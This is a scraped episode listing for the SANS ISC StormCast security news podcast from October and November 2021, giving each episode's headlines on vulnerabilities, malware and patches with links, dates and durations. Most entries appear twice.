Hikvision Security Cameras Potentially Exposed to Remote Code Execution https://isc.sans.edu/forums/diary/Hikvision+Security+Cameras+Potentially+Exposed+to+Remote+Code+Execution/28056/ Detecting PAM Backdoors https://isc.sans.edu/forums/diary/Backdooring+PAM/28058/ Rusted Anchors: A National Client-Side View of Hidden Root CAs in the Web PKI Ecosystem https://dl.acm.org/doi/pdf/10.1145/3460120.3484768 CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory https://www.netspi.com/blog/technical/cloud-penetration-testing/azure-cloud-vulnerability-credmanifest/
11/22/20215 minutes
Episode Artwork

ISC StormCast for Friday, November 19th, 2021

JavaScript Downloader Delivers Agent Tesla Trojan https://isc.sans.edu/forums/diary/JavaScript+Downloader+Delivers+Agent+Tesla+Trojan/28050/ Exposed Firefox cookies.sqlite Databases https://www.theregister.com/2021/11/18/firefox_cookies_github/ FBI Warns of Fatpipe VPN Exploits https://www.ic3.gov/Media/News/2021/211117-2.pdf Abusing ClouDNS https://blog.netlab.360.com/the-pitfall-of-threat-intelligence-whitelisting-specter-botnet-is-taking-over-top-legit-dns-domains-by-using-cloudns-service/
11/19/20216 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, November 19th, 2021

JavaScript Downloader Delivers Agent Tesla Trojan https://isc.sans.edu/forums/diary/JavaScript+Downloader+Delivers+Agent+Tesla+Trojan/28050/ Exposed Firefox cookies.sqlite Databases https://www.theregister.com/2021/11/18/firefox_cookies_github/ FBI Warns of Fatpipe VPN Exploits https://www.ic3.gov/Media/News/2021/211117-2.pdf Abusing ClouDNS https://blog.netlab.360.com/the-pitfall-of-threat-intelligence-whitelisting-specter-botnet-is-taking-over-top-legit-dns-domains-by-using-cloudns-service/
11/19/20216 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, November 18th, 2021

DDS Protocol Implementation Vulnerabilities https://us-cert.cisa.gov/ics/advisories/icsa-21-315-02 Siemens TCP/IP Flaws https://www.forescout.com/blog/new-critical-vulnerabilities-found-on-nucleus-tcp-ip-stack/ Netgear UPNP Stack Based Buffer Overflow https://blog.grimm-co.com/2021/11/seamlessly-discovering-netgear.html
11/18/20214 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, November 18th, 2021

DDS Protocol Implementation Vulnerabilities https://us-cert.cisa.gov/ics/advisories/icsa-21-315-02 Siemens TCP/IP Flaws https://www.forescout.com/blog/new-critical-vulnerabilities-found-on-nucleus-tcp-ip-stack/ Netgear UPNP Stack Based Buffer Overflow https://blog.grimm-co.com/2021/11/seamlessly-discovering-netgear.html
11/18/20214 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, November 17th, 2021

Emotet Returns https://isc.sans.edu/forums/diary/Emotet+Returns/28044/ GitHub Improves npm Security https://github.blog/2021-11-15-githubs-commitment-to-npm-ecosystem-security/ Intel CPU Debug Vulnerability https://www.ptsecurity.com/ww-en/about/news/positive-technologies-discovers-vulnerability-in-intel-processors-used-in-laptops-cars-and-other-devices/ https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00528.html Home Router Vulnerability Listing https://modemly.com/m1/pulse
11/17/20216 minutes, 43 seconds
Episode Artwork

ISC StormCast for Wednesday, November 17th, 2021

Emotet Returns https://isc.sans.edu/forums/diary/Emotet+Returns/28044/ GitHub Improves npm Security https://github.blog/2021-11-15-githubs-commitment-to-npm-ecosystem-security/ Intel CPU Debug Vulnerability https://www.ptsecurity.com/ww-en/about/news/positive-technologies-discovers-vulnerability-in-intel-processors-used-in-laptops-cars-and-other-devices/ https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00528.html Home Router Vulnerability Listing https://modemly.com/m1/pulse
11/17/20216 minutes, 43 seconds
Episode Artwork

ISC StormCast for Tuesday, November 16th, 2021

Microsoft Emergency Update fixes AD Authentication Problems https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9 Using Copy Paste to Change Microsoft AD Password https://isc.sans.edu/forums/diary/Changing+your+AD+Password+Using+the+Clipboard+Not+as+Easy+as+Youd+Think/28036/ Parking Pages Used to Distrbute Malware https://blog.netlab.360.com/zhatuniubility-malware-uses-namesilo-parking-pages-and-googles-custom-pages-to-spread/ Blacksmith Revives Rowhamer https://comsec.ethz.ch/research/dram/blacksmith/
11/16/20216 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, November 16th, 2021

Microsoft Emergency Update fixes AD Authentication Problems https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9 Using Copy Paste to Change Microsoft AD Password https://isc.sans.edu/forums/diary/Changing+your+AD+Password+Using+the+Clipboard+Not+as+Easy+as+Youd+Think/28036/ Parking Pages Used to Distrbute Malware https://blog.netlab.360.com/zhatuniubility-malware-uses-namesilo-parking-pages-and-googles-custom-pages-to-spread/ Blacksmith Revives Rowhamer https://comsec.ethz.ch/research/dram/blacksmith/
11/16/20216 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, November 15th, 2021

Not So Fake FBI E-Mails https://www.fbi.gov/news/pressrel/press-releases/fbi-statement-on-incident-involving-fake-emails https://isc.sans.edu/forums/diary/External+Email+System+FBI+Compromised+Sending+Out+Fake+Warnings/28034/ https://twitter.com/spamhaus/status/1459450061696417792 Reversing Obfuscated Maldoc with BASE64 https://isc.sans.edu/forums/diary/Obfuscated+Maldoc+Reversed+BASE64/28030/ Zoom Updates https://explore.zoom.us/en/trust/security/security-bulletin/ VMWare VCenter Update https://www.vmware.com/security/advisories/VMSA-2021-0025.html Windows User Profile 0-Day LPE https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html
11/15/20215 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, November 15th, 2021

Not So Fake FBI E-Mails https://www.fbi.gov/news/pressrel/press-releases/fbi-statement-on-incident-involving-fake-emails https://isc.sans.edu/forums/diary/External+Email+System+FBI+Compromised+Sending+Out+Fake+Warnings/28034/ https://twitter.com/spamhaus/status/1459450061696417792 Reversing Obfuscated Maldoc with BASE64 https://isc.sans.edu/forums/diary/Obfuscated+Maldoc+Reversed+BASE64/28030/ Zoom Updates https://explore.zoom.us/en/trust/security/security-bulletin/ VMWare VCenter Update https://www.vmware.com/security/advisories/VMSA-2021-0025.html Windows User Profile 0-Day LPE https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html
11/15/20215 minutes, 45 seconds
Episode Artwork

ISC StormCast for Friday, November 12th, 2021

In Memory of Alan Paller. Cyber Security Industry Titan and SANS Institute Founder https://www.sans.org/press/announcements/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away/ https://isc.sans.edu/forums/diary/In+Memory+of+Alan+Paller/28026/
11/12/20213 minutes
Episode Artwork

ISC StormCast for Friday, November 12th, 2021

In Memory of Alan Paller. Cyber Security Industry Titan and SANS Institute Founder https://www.sans.org/press/announcements/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away/ https://isc.sans.edu/forums/diary/In+Memory+of+Alan+Paller/28026/
11/12/20213 minutes
Episode Artwork

ISC StormCast for Thursday, November 11th, 2021

Shadow IT Makes People More Vulnerable to Phishing https://isc.sans.edu/forums/diary/Shadow+IT+Makes+People+More+Vulnerable+to+Phishing/28022/ PaloAlto Networks GlobalProtect VPN CVE-2021-3064 https://www.randori.com/blog/cve-2021-3064/?i=2 Citrix ADC/Gateway/SD-WAN WANOP Patch https://support.citrix.com/article/CTX330728 HPE Aruba Breach https://www.arubanetworks.com/support-services/security-bulletins/central-incident-faq/ LiveStream: Application Security; Web Apps, APIs & Microservices youtu.be/6gGB7skXvpg 2pm ET Today (not 1pm as mentioned in the podcast
11/11/20216 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, November 11th, 2021

Shadow IT Makes People More Vulnerable to Phishing https://isc.sans.edu/forums/diary/Shadow+IT+Makes+People+More+Vulnerable+to+Phishing/28022/ PaloAlto Networks GlobalProtect VPN CVE-2021-3064 https://www.randori.com/blog/cve-2021-3064/?i=2 Citrix ADC/Gateway/SD-WAN WANOP Patch https://support.citrix.com/article/CTX330728 HPE Aruba Breach https://www.arubanetworks.com/support-services/security-bulletins/central-incident-faq/ LiveStream: Application Security; Web Apps, APIs & Microservices youtu.be/6gGB7skXvpg 2pm ET Today (not 1pm as mentioned in the podcast
11/11/20216 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, November 10th, 2021

Microsoft November 2021 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+November+2021+Patch+Tuesday/28018/ Adobe Patches https://helpx.adobe.com/security.html BusyBox Vulnerabilities https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/
11/10/20216 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, November 10th, 2021

Microsoft November 2021 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+November+2021+Patch+Tuesday/28018/ Adobe Patches https://helpx.adobe.com/security.html BusyBox Vulnerabilities https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/
11/10/20216 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, November 9th, 2021

(Ab)Using Security Tools & Controls for the Bad https://isc.sans.edu/forums/diary/AbUsing+Security+Tools+Controls+for+the+Bad/28014/ Targeted Attack Campaign Against ManageEngine ADSelfService Plus https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/ Image-Scaling Attacks in Machine Learning https://www.usenix.org/system/files/sec20fall_quiring_prepub.pdf
11/9/20217 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, November 9th, 2021

(Ab)Using Security Tools & Controls for the Bad https://isc.sans.edu/forums/diary/AbUsing+Security+Tools+Controls+for+the+Bad/28014/ Targeted Attack Campaign Against ManageEngine ADSelfService Plus https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/ Image-Scaling Attacks in Machine Learning https://www.usenix.org/system/files/sec20fall_quiring_prepub.pdf
11/9/20217 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, November 8th, 2021

Decyprting Cobalt Strike Traffic With Keys Extracted From Process Memory https://isc.sans.edu/forums/diary/Decrypting+Cobalt+Strike+Traffic+With+Keys+Extracted+From+Process+Memory/28006/ XMount for Disk Images https://isc.sans.edu/forums/diary/Xmount+for+Disk+Images/28002/ More Proactive SIMs https://medium.com/telecom-expert/more-proactive-sims-f8da2ef8b189 Thunderbird Update https://www.mozilla.org/en-US/security/advisories/mfsa2021-50/
11/8/20215 minutes, 11 seconds
Episode Artwork

ISC StormCast for Monday, November 8th, 2021

Decyprting Cobalt Strike Traffic With Keys Extracted From Process Memory https://isc.sans.edu/forums/diary/Decrypting+Cobalt+Strike+Traffic+With+Keys+Extracted+From+Process+Memory/28006/ XMount for Disk Images https://isc.sans.edu/forums/diary/Xmount+for+Disk+Images/28002/ More Proactive SIMs https://medium.com/telecom-expert/more-proactive-sims-f8da2ef8b189 Thunderbird Update https://www.mozilla.org/en-US/security/advisories/mfsa2021-50/
11/8/20215 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, November 5th, 2021

October 2021 Forensic Contest Answers and Analysis https://isc.sans.edu/forums/diary/October+2021+Forensic+Contest+Answers+and+Analysis/27998/ CVE-2021-43267: Remote Linux Kernel Heap Overflow in TIPC Module https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/ Cisco Patches https://tools.cisco.com/security/center/publicationListing.x The Security Risk of Lacking Compiler Protection in WebAssembly https://arxiv.org/abs/2111.01421
11/5/20217 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, November 5th, 2021

October 2021 Forensic Contest Answers and Analysis https://isc.sans.edu/forums/diary/October+2021+Forensic+Contest+Answers+and+Analysis/27998/ CVE-2021-43267: Remote Linux Kernel Heap Overflow in TIPC Module https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/ Cisco Patches https://tools.cisco.com/security/center/publicationListing.x The Security Risk of Lacking Compiler Protection in WebAssembly https://arxiv.org/abs/2111.01421
11/5/20217 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, November 4th, 2021

Gitlab CVE-2021-22205 Exploited (and often not patched) https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/ New Proxy Shell Exploits Seen Against Exchange https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html Blackmatter Shutting Down Again https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/ Android 0-Day Patched https://source.android.com/security/bulletin/2021-11-01
11/4/20215 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, November 4th, 2021

Gitlab CVE-2021-22205 Exploited (and often not patched) https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/ New Proxy Shell Exploits Seen Against Exchange https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html Blackmatter Shutting Down Again https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/ Android 0-Day Patched https://source.android.com/security/bulletin/2021-11-01
11/4/20215 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, November 3rd, 2021

Revisiting BrakTooth: Two Months Later https://isc.sans.edu/forums/diary/Revisiting+BrakTooth+Two+Months+Later/27992/ Escalating XSS to Sainthood with Nagios https://blog.grimm-co.com/2021/11/escalating-xss-to-sainthood-with-nagios.html Pentaho Business Analytics Vulnerablity https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf
11/3/20215 minutes, 41 seconds
Episode Artwork

ISC StormCast for Wednesday, November 3rd, 2021

Revisiting BrakTooth: Two Months Later https://isc.sans.edu/forums/diary/Revisiting+BrakTooth+Two+Months+Later/27992/ Escalating XSS to Sainthood with Nagios https://blog.grimm-co.com/2021/11/escalating-xss-to-sainthood-with-nagios.html Pentaho Business Analytics Vulnerablity https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf
11/3/20215 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, November 2nd, 2021

Trojan Source: Invisible Vulnerabilities https://www.trojansource.codes/trojan-source.pdf Detecting HTTP Header Smuggling Vulnerabilities https://www.darkreading.com/application-security/free-tool-scans-web-servers-for-vulnerability-to-http-header-smuggling-attacks Kaspersky Lost Amazon Simple Email Service Token https://support.kaspersky.com/general/vulnerability.aspx?el=12430#01112021_phishing
11/2/20217 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, November 2nd, 2021

Trojan Source: Invisible Vulnerabilities https://www.trojansource.codes/trojan-source.pdf Detecting HTTP Header Smuggling Vulnerabilities https://www.darkreading.com/application-security/free-tool-scans-web-servers-for-vulnerability-to-http-header-smuggling-attacks Kaspersky Lost Amazon Simple Email Service Token https://support.kaspersky.com/general/vulnerability.aspx?el=12430#01112021_phishing
11/2/20217 minutes, 3 seconds
Episode Artwork

ISC StormCast for Monday, November 1st, 2021

Remote Desktop Protocol RDP Discovery https://isc.sans.edu/forums/diary/Remote+Desktop+Protocol+RDP+Discovery/27984/ Sysmon Update https://isc.sans.edu/forums/diary/Sysinternals+Autoruns+and+Sysmon+updates/27986/ Google Chrome Updates https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html AbstractEmu Malware Roots Android https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign Microsoft Defender For Endpoint Web Content Filtering https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/web-content-filtering-now-generally-available-on-windows/ba-p/2893357
11/1/20215 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, November 1st, 2021

Remote Desktop Protocol RDP Discovery https://isc.sans.edu/forums/diary/Remote+Desktop+Protocol+RDP+Discovery/27984/ Sysmon Update https://isc.sans.edu/forums/diary/Sysinternals+Autoruns+and+Sysmon+updates/27986/ Google Chrome Updates https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html AbstractEmu Malware Roots Android https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign Microsoft Defender For Endpoint Web Content Filtering https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/web-content-filtering-now-generally-available-on-windows/ba-p/2893357
11/1/20215 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, October 29th, 2021

Critical Hikvision Patch https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/ Shrootless Vulnerability in MacOS https://www.microsoft.com/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/ More Malicious NPM Libraries https://www.theregister.com/2021/10/27/npm_roblox_ransomware/
10/29/20215 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, October 29th, 2021

Critical Hikvision Patch https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/ Shrootless Vulnerability in MacOS https://www.microsoft.com/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/ More Malicious NPM Libraries https://www.theregister.com/2021/10/27/npm_roblox_ransomware/
10/29/20215 minutes, 36 seconds
Episode Artwork

ISC StormCast for Thursday, October 28th, 2021

Outlook Web Access Phishing https://isc.sans.edu/forums/diary/Hunting+for+Phishing+Sites+Masquerading+as+Outlook+Web+Access/27974/ Apple Security Updates Details Available https://support.apple.com/en-us/HT201222 Adobe Patches https://helpx.adobe.com/security/security-bulletin.html PinkBot Botnet Uses DoH https://blog.netlab.360.com/pinkbot/ Jira Insight Patch https://confluence.atlassian.com/adminjiraserver/jira-service-management-security-advisory-2021-10-20-1085186548.html
10/28/20215 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, October 28th, 2021

Outlook Web Access Phishing https://isc.sans.edu/forums/diary/Hunting+for+Phishing+Sites+Masquerading+as+Outlook+Web+Access/27974/ Apple Security Updates Details Available https://support.apple.com/en-us/HT201222 Adobe Patches https://helpx.adobe.com/security/security-bulletin.html PinkBot Botnet Uses DoH https://blog.netlab.360.com/pinkbot/ Jira Insight Patch https://confluence.atlassian.com/adminjiraserver/jira-service-management-security-advisory-2021-10-20-1085186548.html
10/28/20215 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, October 27th, 2021

Apple Updates Everything (but no details yet) https://support.apple.com/en-sa/HT201222 Craigslist E-Mail Hijack https://www.inky.com/blog/urgency-mail-relay-serve-phishers-well-on-craigslist UltimaSMS Android Malware https://blog.avast.com/premium-sms-scam-apps-on-play-store-avast Firefox Proxy Malware https://blog.mozilla.org/security/2021/10/25/securing-the-proxy-api-for-firefox-add-ons/
10/27/20215 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, October 27th, 2021

Apple Updates Everything (but no details yet) https://support.apple.com/en-sa/HT201222 Craigslist E-Mail Hijack https://www.inky.com/blog/urgency-mail-relay-serve-phishers-well-on-craigslist UltimaSMS Android Malware https://blog.avast.com/premium-sms-scam-apps-on-play-store-avast Firefox Proxy Malware https://blog.mozilla.org/security/2021/10/25/securing-the-proxy-api-for-firefox-add-ons/
10/27/20215 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, October 26th, 2021

Decrypting Cobalt Strike Traffic https://isc.sans.edu/forums/diary/Decrypting+Cobalt+Strike+Traffic+With+a+Leaked+Private+Key/27968/ Critical Discourse Vulnerability https://us-cert.cisa.gov/ncas/current-activity/2021/10/24/critical-rce-vulnerability-discourse Discourse Discussion Platform RCE https://github.com/discourse/discourse/security/advisories/GHSA-jcjx-pvpc-qgwq https://0day.click/recipe/discourse-sns-rce/ ua-parser-js malware https://github.com/advisories/GHSA-pjwm-rvh2-c87w Vulnerable Billing Software BillQuick Web Used to Deploy Ransomware https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
10/26/20214 minutes, 44 seconds
Episode Artwork

ISC StormCast for Tuesday, October 26th, 2021

Decrypting Cobalt Strike Traffic https://isc.sans.edu/forums/diary/Decrypting+Cobalt+Strike+Traffic+With+a+Leaked+Private+Key/27968/ Critical Discourse Vulnerability https://us-cert.cisa.gov/ncas/current-activity/2021/10/24/critical-rce-vulnerability-discourse Discourse Discussion Platform RCE https://github.com/discourse/discourse/security/advisories/GHSA-jcjx-pvpc-qgwq https://0day.click/recipe/discourse-sns-rce/ ua-parser-js malware https://github.com/advisories/GHSA-pjwm-rvh2-c87w Vulnerable Billing Software BillQuick Web Used to Deploy Ransomware https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
10/26/20214 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, October 25th, 2021

Malware Quiz https://isc.sans.edu/forums/diary/October+2021+Contest+Forensic+Challenge/27960/ Odd Zip Files https://isc.sans.edu/forums/diary/Phishing+ZIP+With+Malformed+Filename/27966/ Decrypting Cobalt Strike Configurations Using Known Secret Keys https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/ Tracking BLE Fingerprints https://cseweb.ucsd.edu/~nibhaska/papers/sp22_paper.pdf GPS Software Bug https://us-cert.cisa.gov/ncas/current-activity/2021/10/21/gps-daemon-gpsd-rollover-bug https://isc.sans.edu/forums/diary/Keeping+Track+of+Time+Network+Time+Protocol+and+a+GPSD+Bug/27886/
10/25/20215 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, October 25th, 2021

Malware Quiz https://isc.sans.edu/forums/diary/October+2021+Contest+Forensic+Challenge/27960/ Odd Zip Files https://isc.sans.edu/forums/diary/Phishing+ZIP+With+Malformed+Filename/27966/ Decrypting Cobalt Strike Configurations Using Known Secret Keys https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/ Tracking BLE Fingerprints https://cseweb.ucsd.edu/~nibhaska/papers/sp22_paper.pdf GPS Software Bug https://us-cert.cisa.gov/ncas/current-activity/2021/10/21/gps-daemon-gpsd-rollover-bug https://isc.sans.edu/forums/diary/Keeping+Track+of+Time+Network+Time+Protocol+and+a+GPSD+Bug/27886/
10/25/20215 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, October 22nd, 2021

Stolen Images Evidence Campaign Pushes Sliver Based Malware https://isc.sans.edu/forums/diary/Stolen+Images+Evidence+campaign+pushes+Sliverbased+malware/27954/ FiveSys Rootkit Signed By Microsoft https://www.bitdefender.com/files/News/CaseStudies/study/405/Bitdefender-DT-Whitepaper-Fivesys-creat5699-en-EN.pdf Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2021.html WinRAR Vulnerability https://swarm.ptsecurity.com/winrars-vulnerable-trialware-when-free-software-isnt-free/ Crypto Mining npm Libraries https://blog.sonatype.com/newly-found-npm-malware-mines-cryptocurrency-on-windows-linux-macos-devices
10/22/20216 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, October 22nd, 2021

Stolen Images Evidence Campaign Pushes Sliver Based Malware https://isc.sans.edu/forums/diary/Stolen+Images+Evidence+campaign+pushes+Sliverbased+malware/27954/ FiveSys Rootkit Signed By Microsoft https://www.bitdefender.com/files/News/CaseStudies/study/405/Bitdefender-DT-Whitepaper-Fivesys-creat5699-en-EN.pdf Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2021.html WinRAR Vulnerability https://swarm.ptsecurity.com/winrars-vulnerable-trialware-when-free-software-isnt-free/ Crypto Mining npm Libraries https://blog.sonatype.com/newly-found-npm-malware-mines-cryptocurrency-on-windows-linux-macos-devices
10/22/20216 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, October 21st, 2021

Thanks to Covid 19: New Types of Documents are Lost in the Wild https://isc.sans.edu/forums/diary/Thanks+to+COVID19+New+Types+of+Documents+are+Lost+in+The+Wild/27952/ Google Chrome 95 Released https://chromestatus.com/roadmap Squirrel VM Bug https://thehackernews.com/2021/10/squirrel-engine-bug-could-let-attackers.html BlackByte Decryptor Released https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/ https://github.com/SpiderLabs/BlackByteDecryptor
10/21/20215 minutes, 38 seconds
Episode Artwork

ISC StormCast for Thursday, October 21st, 2021

Thanks to Covid 19: New Types of Documents are Lost in the Wild https://isc.sans.edu/forums/diary/Thanks+to+COVID19+New+Types+of+Documents+are+Lost+in+The+Wild/27952/ Google Chrome 95 Released https://chromestatus.com/roadmap Squirrel VM Bug https://thehackernews.com/2021/10/squirrel-engine-bug-could-let-attackers.html BlackByte Decryptor Released https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/ https://github.com/SpiderLabs/BlackByteDecryptor
10/21/20215 minutes, 38 seconds
Episode Artwork

ISC StormCast for Wednesday, October 20th, 2021

Can You Make the Great Chinese Firewall Work For You https://isc.sans.edu/forums/diary/Can+you+make+the+Great+Chinese+Firewall+work+for+you/27948/ Fake Government Assistance Websites https://www.ic3.gov/Media/Y2021/PSA211015 TA505 Coming Back https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant BlackMatter Ransomware https://us-cert.cisa.gov/ncas/alerts/aa21-291a
10/20/20214 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, October 20th, 2021

Can You Make the Great Chinese Firewall Work For You https://isc.sans.edu/forums/diary/Can+you+make+the+Great+Chinese+Firewall+work+for+you/27948/ Fake Government Assistance Websites https://www.ic3.gov/Media/Y2021/PSA211015 TA505 Coming Back https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant BlackMatter Ransomware https://us-cert.cisa.gov/ncas/alerts/aa21-291a
10/20/20214 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, October 19th, 2021

Malcious PowerShell Script Using Client Certificate Authentication https://isc.sans.edu/forums/diary/Malicious+PowerShell+Using+Client+Certificate+Authentication/27944/ PowerShell Updates https://github.com/PowerShell/Announcements/issues/27 Juniper JunOS Patches https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES TianFu Cup https://tianfucup.com/en/#canjia
10/19/20215 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, October 19th, 2021

Malcious PowerShell Script Using Client Certificate Authentication https://isc.sans.edu/forums/diary/Malicious+PowerShell+Using+Client+Certificate+Authentication/27944/ PowerShell Updates https://github.com/PowerShell/Announcements/issues/27 Juniper JunOS Patches https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES TianFu Cup https://tianfucup.com/en/#canjia
10/19/20215 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, October 18th, 2021

Active Scanning for Apache Vulnerabilities CVE-2021-41773 and 42013 https://isc.sans.edu/forums/diary/Apache+is+Actively+Scan+for+CVE202141773+CVE202142013/27940/ Warranty Repairs and Non Removable Storage Risks https://isc.sans.edu/forums/diary/Warranty+Repairs+and+NonRemovable+Storage+Risks/27938/ Crypto Wallet Compromised on OpenSea NFT Marketplace https://blog.checkpoint.com/2021/10/13/check-point-software-prevents-theft-of-crypto-wallets-on-opensea-the-worlds-largest-nft-marketplace/ $5.2 Billion worth of Bitcoin Transactions Linked to Ransomware https://www.fincen.gov/sites/default/files/shared/Financial%20Trend%20Analysis_Ransomeware%20508%20FINAL.pdf
10/18/20215 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, October 18th, 2021

Active Scanning for Apache Vulnerabilities CVE-2021-41773 and 42013 https://isc.sans.edu/forums/diary/Apache+is+Actively+Scan+for+CVE202141773+CVE202142013/27940/ Warranty Repairs and Non Removable Storage Risks https://isc.sans.edu/forums/diary/Warranty+Repairs+and+NonRemovable+Storage+Risks/27938/ Crypto Wallet Compromised on OpenSea NFT Marketplace https://blog.checkpoint.com/2021/10/13/check-point-software-prevents-theft-of-crypto-wallets-on-opensea-the-worlds-largest-nft-marketplace/ $5.2 Billion worth of Bitcoin Transactions Linked to Ransomware https://www.fincen.gov/sites/default/files/shared/Financial%20Trend%20Analysis_Ransomeware%20508%20FINAL.pdf
10/18/20215 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, October 15th, 2021

Port Forwarding with Windows for the Win https://isc.sans.edu/forums/diary/PortForwarding+with+Windows+for+the+Win/27934/ Please Fix Your E-Mail Brute Forcing Tool https://isc.sans.edu/forums/diary/Please+fix+your+EMail+Brute+forcing+tool/27930/ Ad Blocker Injects Ads https://www.imperva.com/blog/the-ad-blocker-that-injects-ads/ Romance Scams Go After Crypto Currency https://nakedsecurity.sophos.com/2021/10/13/romance-scams-with-a-cryptocurrency-twist-new-research-from-sophoslabs/ Sysmon For Linux https://github.com/Sysinternals/SysmonForLinux Foxit Updates https://www.foxit.com/support/security-bulletins.html VMWare Updates https://www.vmware.com/security/advisories/VMSA-2021-0023.html
10/15/20216 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, October 15th, 2021

